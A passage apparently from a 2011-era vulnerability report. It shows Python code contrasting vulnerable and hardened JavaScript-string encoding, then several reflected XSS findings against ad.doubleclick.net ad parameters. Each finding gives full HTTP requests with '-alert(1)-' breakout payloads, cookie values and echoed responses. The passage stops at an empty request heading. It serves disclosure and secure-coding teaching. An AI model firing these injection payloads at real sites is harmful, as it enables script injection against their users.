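    """Vulnerable: blocklist check, then raw interpolation into a JS string.
    The NUL is discarded on output, so the browser receives the unfiltered
    tail of the value inside the string literal."""
    if naive_filter_rejects(param):
        return 'var rm_url = "";'
    return 'var rm_url = "%s%s";' % (PREFIX, param.replace("\x00", ""))


def js_string(value: str) -> str:
    """Hardened: encode for the JavaScript-string context. json.dumps escapes
    quotes, backslashes and control characters (NUL becomes \\u0000) and,
    with the default ensure_ascii, the U+2028/2029 line terminators; '</' is
    escaped as well so the value can never close the enclosing <script>."""
    return json.dumps(value).replace("</", "<\\/")


def render_hardened(param: str) -> str:
    """No blocklist at all: the encoder makes any value inert in this context."""
    return "var rm_url = %s;" % js_string(PREFIX + param)


def outside_string(js: str) -> str:
    """Characters of a JS fragment that are NOT inside a double-quoted string
    literal, honouring backslash escapes. Anything from a payload that ends
    up here is executable; this is the check a reviewer should make on the
    captured response instead of trusting the scanner's echo test."""
    out, in_str, i = [], False, 0
    while i < len(js):
        c = js[i]
        if in_str:
            if c == "\\":
                i += 1  # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    # Payloads taken from the report: plain, and with the %00 prefix decoded.
    for p in ('27220"-alert(1)-"e1de420c95d', '\x009d689"-alert(1)-"d3bf0e85614'):
        print(render_vulnerable(p), "->", outside_string(render_vulnerable(p)))
        print(render_hardened(p), "->", outside_string(render_hardened(p)))
```

`outside_string` applied to the vulnerable rendering of the NUL-prefixed payload yields `var rm_url = -alert(1)-;`, which is the proof that the string was broken out of; applied to the hardened rendering it yields only `var rm_url = ;`. Note that this is specific to the double-quoted JS string context; a value reflected into an HTML attribute or element body needs HTML encoding in addition, and a value used as a URL (as `rm_url` is) should also be restricted to http/https schemes before it is handed to the browser.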
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12e2"-alert(1)-"d2dd61e57b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=la12e2"-alert(1)-"d2dd61e57b5&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:47:34 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:47:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7259
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/1d1/%2a/p%3B234427567%3B0-0%3B0%3B50265525%3B2321-160/600%3B38432112/38449869/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=la12e2"-alert(1)-"d2dd61e57b5&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzg ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420e2"-alert(1)-"3ee7a7f2227 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=420e2"-alert(1)-"3ee7a7f2227 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4945 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:17:36 GMT Expires: Sun, 20 Mar 2011 17:17:36 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... gEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=420e2"-alert(1)-"3ee7a7f2227http://www.dishnetwork.com/redirects/promotion/offer22/default.aspx?utm_source=google&utm_medium=display&utm_campaign=testbooyah"); var wmode = "opaque"; var bg = "ffffff"; var dcallowscriptaccess = "n ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e99"-alert(1)-"97bc0f3b553 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQa8e99"-alert(1)-"97bc0f3b553&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:15:10 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:15:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bafa"-alert(1)-"d8c8c6c02f6 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-12546523889173693bafa"-alert(1)-"d8c8c6c02f6&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:17:04 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:17:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... EuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-12546523889173693bafa"-alert(1)-"d8c8c6c02f6&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah"); var wmode = "opaque"; var bg = "ffffff"; var ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbc00"-alert(1)-"a8ca45bd5fa was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1bbc00"-alert(1)-"a8ca45bd5fa&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:15:45 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:15:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561bf"-alert(1)-"af108c5ab54 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ561bf"-alert(1)-"af108c5ab54&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:16:29 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:16:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... BB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ561bf"-alert(1)-"af108c5ab54&client=ca-pub-1254652388917369&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah"); var wmode = " ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2783"-alert(1)-"7deaeb24a8f was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=la2783"-alert(1)-"7deaeb24a8f&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:14:41 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff315'-alert(1)-'17113cbd15f was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0ff315'-alert(1)-'17113cbd15f&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:54 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... B234167733%3B1-0%3B0%3B57514523%3B933-120/600%3B40960228/40978015/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0ff315'-alert(1)-'17113cbd15f&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2975056%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww. ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fb1"-alert(1)-"3937b134a54 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=055fb1"-alert(1)-"3937b134a54&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:49 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=055fb1"-alert(1)-"3937b134a54&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2970103%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww. ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3ca3'-alert(1)-'54b41a5bbc9 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
